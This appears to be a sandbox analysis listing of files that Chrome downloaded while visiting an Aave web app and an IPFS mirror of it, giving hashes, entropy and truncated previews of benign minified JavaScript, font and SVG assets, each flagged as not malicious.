                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9410],{62753:function(e,t,n){var o=n(64836);t.Z=void 0;var r=o(n(64938)),i=n(85893),a=(0,r.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},62278:function(e,t,n){var o=n(54235),r=n(85893);t.Z=(0,o.Z)((0,r.jsx)("path",{d:"M16 1H4c-1.1 0-2 .9-2 2v14h2V3h12V1zm3 4H8c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm0 16H8V7h11v14z"}),"ContentCopyOutlined")},39702:function(e,t,n){var o=n(54235),r=n(85893);t.Z=(0,o.Z)((0,r.jsx)("path",{d:"M5 20h14v-2H5v2zM19 9h-4V3H9v6H5l7 7 7-7z"}),"Download")},75158:function(e,t,n){n.d(t,{Z:function(){retur
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (35659), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):35659
                                                                                                                                                                                                                                                  Entropy (8bit):5.444564509616748
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:OyPs69ilDq/6Eokq/kcnzFHwWvDn3pZ7jWSK5FnFVzmCtMGbJX:o/PNHwWv63nBLX
                                                                                                                                                                                                                                                  MD5:F6931F2D3F6362D8A7B0FCF565FA8A52
                                                                                                                                                                                                                                                  SHA1:FDB7FE0FBC2B7EBB0C316ED65E50842B2E18C900
                                                                                                                                                                                                                                                  SHA-256:EFCD1CDF2B9ACD825CF18822CEDB2BE878A290ED82E2DC29E5D125C474E6B832
                                                                                                                                                                                                                                                  SHA-512:0D4A923CD343CF8E1D46A35D13D9F5796D6C08A50CE1FEBD4CBC1109E0CD7912C75CB83F5AB2A46BD29B5071F79B01BCB7C22A18A473BD1A5109E6BADA39975D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/797.3519e0e5bb08cfaa.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[797],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),s=r(67294),a=r(86010),i=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","classNam
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):980278
                                                                                                                                                                                                                                                  Entropy (8bit):5.846645230901696
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:Qb57+cb0NGl3c/e46gPI6f0+PoUkMQXEERestk2GqGZ14SdeKuUAAr+ReOhdJJu6:+h+c2GlceaIuHEY1BeKd+zJuUtATkS7u
                                                                                                                                                                                                                                                  MD5:75EAB8DD83B9F39C97B15917D1787D02
                                                                                                                                                                                                                                                  SHA1:102B660D7E3ABC958BB844C1D5D9C664CA551EAC
                                                                                                                                                                                                                                                  SHA-256:3FB5D129D6830524A7AD34581D1CCCC4A1102DBDE75C1BEBE40F80CBC852E12E
                                                                                                                                                                                                                                                  SHA-512:F25BC2B326F1CD7E58635CA9C5C62BF5D711964F16B0FF3118E00BC5ADF86DE1E59DA3B774776C588E7B299D9EA1BC75639E0B1F34C42130E698EBB9E92479B2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(()=>{var e={654861:function(e,t,r){e=r.nmd(e);var n=function(e){"use strict";var t=c(9007199254740992),r="0123456789abcdefghijklmnopqrstuvwxyz",a="function"==typeof BigInt;function o(e,t,r,n){return void 0===e?o[0]:void 0!==t?10!=+t||r?K(e,t,r,n):W(e):W(e)}function i(e,t){this.value=e,this.sign=t,this.isSmall=!1}function _(e){this.value=e,this.sign=e<0,this.isSmall=!0}function E(e){this.value=e}function s(e){return -9007199254740992<e&&e<9007199254740992}function c(e){return e<1e7?[e]:e<1e14?[e%1e7,Math.floor(e/1e7)]:[e%1e7,Math.floor(e/1e7)%1e7,Math.floor(e/1e14)]}function I(e){u(e);var r=e.length;if(r<4&&0>g(e,t))switch(r){case 0:return 0;case 1:return e[0];case 2:return e[0]+1e7*e[1];default:return e[0]+(e[1]+1e7*e[2])*1e7}return e}function u(e){for(var t=e.length;0===e[--t];);e.length=t+1}function l(e){for(var t=Array(e),r=-1;++r<e;)t[r]=0;return t}function R(e){return e>0?Math.floor(e):Math.ceil(e)}function A(e,t){var r,n,a=e.length,o=t.length,i=Array(a),_=0;for(n=0;n<o;n++)_=(r=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 106108, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):106108
                                                                                                                                                                                                                                                  Entropy (8bit):7.997330968548761
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:nLj6taUgda0xgEkzkFDcgwkUWTCUSj03LX8SbGeLDy1FAk1l+3WhLU+EMDPTGCaT:vUgkGgbS91UWTFSjpStLDy1FX1+Q1/B8
                                                                                                                                                                                                                                                  MD5:37DA9EECF61EBCED804B266B14EEF98E
                                                                                                                                                                                                                                                  SHA1:72F6E4D5124D09735DA3CB97BA05F126C5651997
                                                                                                                                                                                                                                                  SHA-256:307D980962214FFA01B106339EDCB5D2E6EF3A9607B9B815BB7287D2C735C68F
                                                                                                                                                                                                                                                  SHA-512:143601646B472E5309CEC049CF7FB00AD93BDD3812DF9E11A71C5806C2D086E2454C341A61447016BA240D9F6523E112B20678A439C442A6EFAF817DD5CCBCBC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/media/Inter-ExtraBold.d65f0281.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......|..........................................r...J.`..........e..T..6.$..N. ..,...-[73..J..$gc.e....A(h....!&.J..U.%.L...C.0.{Ns.....!*!AP.j....Z^W.m.m..-................{Y.#...?..O....E......x.*.........*Y....sI...d.J.b'c...<....6=....8...Fb. D...ai...E$.4..3..9.@..." uU%.D+..u.. .hV...k....$....*...|.C...5-h1.S:=.....S8cK.........t1.#...!.'..Hl......t, .5..............AOU.cVa...J...@....Xw,.B. ....3..5y..dY.....".|)n.:.....o..UwF...*.8..W.X;a.B.VZR.o.^.a0..M..<.3.=..,.3...A....#......XO..D..w.0z..R.Tj.JH..~..4..t>2..!n..`:4....S.?....y.~..&...^...{e.{..4.F.D&.....-...@.EP&E...$.......yE.......".-|......w...C..G..EpLa..).@JT.h.Iw...Rx..1.6^&.H.S...Y..5.RB.?........bL..qA...Ud]r........P...jb.i..+..wk_..Y.O...E..>..)..{...t...pJ..../.....T.../.3.az..S........E..,./.....eE.x....*." B...l.6....4...C..1...4.E8.%r..r.%..TJ;9..T|IH../.........3......Q0...Y...V..-. l.......T.J..:\..sE>}/b...y...'.d..y..9.?u..H.].Z.CD.)......U....l
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12681), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):12681
                                                                                                                                                                                                                                                  Entropy (8bit):5.405332495061492
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:RyPmL764xzJX42xrAXChKN/iN/a6mgAJGbYsL4:RyPi7nzJDxkXC4ViValnJGbk
                                                                                                                                                                                                                                                  MD5:7F8C1022ED8876BB6FA7559FE69B8759
                                                                                                                                                                                                                                                  SHA1:22993C83AA0CBFB22AE7D24C66BE86D3E2DA1ADB
                                                                                                                                                                                                                                                  SHA-256:E01944D2D04402EF9AB03AE9C65CF52604E44759DA539C13337D80CD6426A8A7
                                                                                                                                                                                                                                                  SHA-512:C4A2CF6C9932A99D2AF9DC01B02EB20823F09961860CA6852A3F68EF2F8054576C6113249B2907765E8147E170FFC841501537DD698E0D9E264A5632D2948A71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/7566.99a87831b4543cdd.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7566],{62753:function(e,t,r){"use strict";var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){"use strict";r.d(t,{Z:function(){return y}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),u=r(78884),l=r(36622),f=r(34867);function d(e){return(0,f.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const v=["baseClassN
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12167), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):12167
                                                                                                                                                                                                                                                  Entropy (8bit):5.537485892227994
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:DHVadvGaBAq0eiVfkG3G88YRI7bKNJjZ2WWYWYo0NP1CicLScEW9/Qm5Sv1:DIduaBAq0eMXoYRI7OzF2lYHN1CicL1a
                                                                                                                                                                                                                                                  MD5:3D132E0026FBA886C13916FDB5E33D01
                                                                                                                                                                                                                                                  SHA1:E4D4D6A926D0D2588AAF7A497369A09C17397730
                                                                                                                                                                                                                                                  SHA-256:EA5A9774A01EFE33251E0AAF997F8DD4732BFBC6BE28E4C0E1C92A0626370924
                                                                                                                                                                                                                                                  SHA-512:2D4917FC0D6848FA631E4779CCD7E0BB2097CECEF4407970C442E58C537C2D41A1E30C070F92A9BA9749895EEC3D45472D79E96B83EF2CCFB9C47A72D19FE1E8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/7978-570f194bf991f35f.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7978],{41024:function(e,t,r){r.d(t,{J:function(){return p},B:function(){return b}});var n=r(59499),o=r(4730),i=r(1279),a=r(29630),c=r(85893),s=["value","symbol","visibleDecimals","compact","percent","symbolsVariant","symbolsColor","roundDown","compactThreshold"];function l(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?l(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):l(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var d=["","K","M","B","T","P","E","Z","Y"],p=function(e){var t=e.value,r=e.visibleDeci
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15005), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):15005
                                                                                                                                                                                                                                                  Entropy (8bit):5.528594448989494
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:FCyauhsPCZtMWOQAW/VDtmKYI4xxPoHG1Lo1rFoQBVo1NOwfN2WuGsmgl7L/:o6AWv8IqxPoHILo1eQBVLUN2xplv/
                                                                                                                                                                                                                                                  MD5:3AAF9CC76EE4BA3CF674FA5EEE750FAE
                                                                                                                                                                                                                                                  SHA1:2C64D9FBD26F628D70F38BF59E65AC65D0A588C4
                                                                                                                                                                                                                                                  SHA-256:CE83AA73D449364B8DADB5539E750C4517174396EAF2F8C8B531633ED57C07DB
                                                                                                                                                                                                                                                  SHA-512:57FE7B4FBA807DB54CC1F3105A3CEA32822C6482ABDD75820FD93087E005AEB86C62EFC3EB2B01360C50FC348A741B7569F127F9E94A26982C0694A9CEBB7FBB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/7604-eabb8e5b8018f878.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7604],{76920:function(e,r,t){var n,i,o=t(67294);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e},s.apply(this,arguments)}r.Z=function(e){return o.createElement("svg",s({viewBox:"0 0 12 12",fill:"none",xmlns:"http://www.w3.org/2000/svg"},e),n||(n=o.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M6.78.628a.6.6 0 0 1 .42.572v3h2.4a.6.6 0 0 1 .492.944l-4.2 6A.6.6 0 0 1 4.8 10.8v-3H2.4a.6.6 0 0 1-.492-.944l4.2-6A.6.6 0 0 1 6.78.628Z",fill:"url(#lightningBoltGradient_svg__a)"})),i||(i=o.createElement("defs",null,o.createElement("linearGradient",{id:"lightningBoltGradient_svg__a",x1:10.2,y1:4.672,x2:1.345,y2:7.335,gradientUnits:"userSpaceOnUse"},o.createElement("stop",{stopColor:"#B6509E"}),o.createElement("stop",{offset:1,stopColor:"#2EBAC6"})))))}},96875
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4254), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                                                                                                  Entropy (8bit):5.567365538036847
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ib71BNSelDmQUwohXsE1s4ZxrK/ZKvQQnuF9FU5CspIulDVy0ZpoIScHFB1P8DUr:0SelSJwS5M/ZKj95DptokoA07wgjVe5n
                                                                                                                                                                                                                                                  MD5:D89E32DA8C25A7900998E9F78A477C62
                                                                                                                                                                                                                                                  SHA1:04B350CA6D25526A95BDBF6F067FD091FCD451B2
                                                                                                                                                                                                                                                  SHA-256:4A90B901C48DBA63AE44E5541F49704B21B3D5DE6EA1611EA6F4F8150BEDFA6C
                                                                                                                                                                                                                                                  SHA-512:EDD59CD9E2115E18BE5BEAE59B39DE208D9810457125D080468F2056652F67FBB244F40E450DD9174A7DB04F9A790C73980C21A4C9FDF4B7300BDB698B21BD51
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/8345.c21c07eb7538546d.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8345],{58345:function(e,t,n){n.r(t),n.d(t,{StakeRewardClaimRestakeModal:function(){return U}});var r=n(67294),o=n(8195),a=n(31959),s=n(49501),i=n(75331),c=n(1279),l=n(29630),u=n(54401),d=n(77912),m=n(60265),v=n(77537),k=n(78371),p=n(84568),x=n(63206),b=n(53601),f=n(63491),j=n(67916),N=n(93608),g=n(57824),y=n(78944),O=n(10343),A=n(59499),h=n(50029),w=n(4730),T=n(87794),C=n.n(T),E=n(89291),S=n(67489),R=n(85893),P=["amountToClaim","isWrongNetwork","sx","symbol","blocked","selectedToken"];function _(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var I,D=function(e){var t=e.amountToClaim,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,l=(0,w.Z)(e,P),u=(0,k.Y)((function(e){return e.claimRewardsAndStake})),d=(0,E.Q)({tryPermit:!1,handleGetTxns:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                  Entropy (8bit):4.791566518594403
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tcGtupzDW+k7Oq5NSqTNhReWpRYfjBjkTkCPXUtkv:2GSG7OqPBaFp2ks
                                                                                                                                                                                                                                                  MD5:EAA405456DB4FB48D937AF1DB371B835
                                                                                                                                                                                                                                                  SHA1:D7F4DF1702BF830C60ABA056BDFE947D941D5430
                                                                                                                                                                                                                                                  SHA-256:6FA4DDBD9B1E81DAEF550A249A098431CAAE4CC5B9AAEAADAD86A547D32EEDB4
                                                                                                                                                                                                                                                  SHA-512:E5F590A73EE767AEB9EA03BD7120A84CFCE8563D41934761B6CE8C2DACC3D67B85C1443475F7F03AC616F17489AE6B8FE25D8A90C70BEC184B8583C2D6D56AE4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/flags/en.svg
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M-3.628-.076v14.154h26.96V-.076h-26.96Z" fill="#012169"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.73 15.344 9.852 8.583l-12.878 6.761-1.205-2.534L6.837 7-4.23 1.19l1.205-2.534L9.852 5.417 22.73-1.344l1.205 2.534L12.867 7l11.068 5.81-1.205 2.534Z" fill="#fff"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.93 14.921 9.852 8.054-3.226 14.92l-.805-1.689L7.843 7-4.03.767l.805-1.689L9.852 5.946 22.93-.922l.805 1.69L11.86 7l11.874 6.232-.805 1.69Z" fill="#C8102E"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M12.099 14.077H7.605V9.36H-3.628V4.64H7.605V-.076h4.494V4.64h11.233v4.72H12.1v4.717Z" fill="#fff"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M11.2 14.077H8.504V8.416H-3.628V5.585H8.504V-.076H11.2v5.66h12.132v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71691
                                                                                                                                                                                                                                                  Entropy (8bit):5.290566318478528
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:O2uB0DdnFpVMQfuhkGT0iCfWXRFGY+9Ti:OAVm6GT0BuhFSTi
                                                                                                                                                                                                                                                  MD5:9612DEE64A8F3AD04BC68825DE164872
                                                                                                                                                                                                                                                  SHA1:A209961210B29D86F200EB7F70550EF2BFF17EF5
                                                                                                                                                                                                                                                  SHA-256:B18A7EC622A23BDDD75CA937CDD0DFA384F3AA1C5D276CBFAB59776F77CAAA1B
                                                                                                                                                                                                                                                  SHA-512:7D097E25A903F850A5A627842C377ECE5B270D9AF40237A6AECFD9E232BB9856BF6AE5AEF62236790BEBC2576E1F53245DFD66AD6DE08E3E05DD5D7BA6BB97BE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3662],{96486:function(n,t,r){var e;n=r.nmd(n),function(){var u,i="Expected a function",o="__lodash_hash_undefined__",f="__lodash_placeholder__",a=16,c=32,l=64,s=128,h=256,p=1/0,v=9007199254740991,_=NaN,g=4294967295,y=[["ary",s],["bind",1],["bindKey",2],["curry",8],["curryRight",a],["flip",512],["partial",c],["partialRight",l],["rearg",h]],d="[object Arguments]",b="[object Array]",w="[object Boolean]",m="[object Date]",x="[object Error]",j="[object Function]",A="[object GeneratorFunction]",k="[object Map]",O="[object Number]",I="[object Object]",E="[object Promise]",R="[object RegExp]",z="[object Set]",S="[object String]",C="[object Symbol]",W="[object WeakMap]",L="[object ArrayBuffer]",U="[object DataView]",B="[object Float32Array]",T="[object Float64Array]",$="[object Int8Array]",D="[object Int16Array]",N="[object Int32Array]",M="[object Uint8Array]",F="[object Uint8ClampedArray]",P="[object Uint16Array]",q="[object Uint32Array]
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9876), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9876
                                                                                                                                                                                                                                                  Entropy (8bit):5.284716799878069
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:h9bEDHZT0TA7l6D2Kt0RwzGwsV8oXiTRIvu664:WAQ
                                                                                                                                                                                                                                                  MD5:009EAE380D18E68D02FD3B1EFE0B3979
                                                                                                                                                                                                                                                  SHA1:F16F04E668DE6B1960B8E060A897AAAD24B7DC69
                                                                                                                                                                                                                                                  SHA-256:3B970DE2228A8DFAD7880CCA281E91DB8DB698E103B8925638915287AEF6032F
                                                                                                                                                                                                                                                  SHA-512:A8C53DBAEC8788C3AA137A75E43E5119708617574CE641FA88BC0B54AE745D3BD414BBF29D4203DA8623BDCEFCA2C8EAF8F83E17091F66F36B38D8B559EE0DE2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3629],{43629:function(e,r,t){t.d(r,{hv:function(){return W},rM:function(){return J},wD:function(){return K},ov:function(){return H}});var n=t(59499),o=t(4730),i=t(1279),c=t(67294),s=t(49501),a=t(58771),p=t(30120),l=t(68861),u=t(58527),b=t(85893),d=["borrowCap"];function f(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function y(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?f(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):f(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var j=function(e){var r=e.borrowCap,t=(0,o.Z)(e,d);return r&&r.isMaxed?(0,b.jsx)(p.Z,{s
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17412)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17461
                                                                                                                                                                                                                                                  Entropy (8bit):5.594663499090488
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ewLnWOUnUuyMNps0HHHsglNzUxBAAdTRIZWiv/XB2iQBYM:9LQne0P5UxMXB2izM
                                                                                                                                                                                                                                                  MD5:B9F703BE7873D3345873D81FA4454C0D
                                                                                                                                                                                                                                                  SHA1:39415C88914012552733A2B30E66C2E62453746B
                                                                                                                                                                                                                                                  SHA-256:33AB23E5DF97662D946B76428A2DC962998B670FC24127B2817799D14A9A2F3A
                                                                                                                                                                                                                                                  SHA-512:3E15A8117CCB11BFC4866C539CA6511FD2B39CC771072971F1FD1ECB889BBA55F6C9FD0788287ACAE445802C44C2F13BBBD9FB3E32189E14D0BBD3B6C8D38670
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78776"],{884835:function(t,e,r){"use strict";var o=r(311596);function n(){}function i(){}i.resetWarningCache=n,t.exports=function(){function t(t,e,r,n,i,a){if(a!==o){var u=Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw u.name="Invariant Violation",u}}function e(){return t}t.isRequired=t;var r={array:t,bigint:t,bool:t,func:t,number:t,object:t,string:t,symbol:t,any:t,arrayOf:e,element:t,elementType:t,instanceOf:e,node:t,objectOf:e,oneOf:e,oneOfType:e,shape:e,exact:e,checkPropTypes:i,resetWarningCache:n};return r.PropTypes=r,r}},639519:function(t,e,r){t.exports=r(884835)()},311596:function(t){"use strict";t.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},58615:function(t,e,r){var o=r(338091);function n(t){this.mode=o.MODE_8BIT_BYTE,this.data=t}n.prototype={getLength:fu
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):292292
                                                                                                                                                                                                                                                  Entropy (8bit):5.579204091604126
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:ETwUYzK1DV+CdvpsWKEOv87EsZqyPB7W3vZNvuddjCjM7+MsesjZvhiQg9zsVamK:aOwvNOTspdESu3K6uIB2FaDQsEdC2qlY
                                                                                                                                                                                                                                                  MD5:59ACE95E6420E02B2AFF3B0D8008A4E9
                                                                                                                                                                                                                                                  SHA1:8FBDA588DFC9739FD55BB12F8A0ADF5670312D64
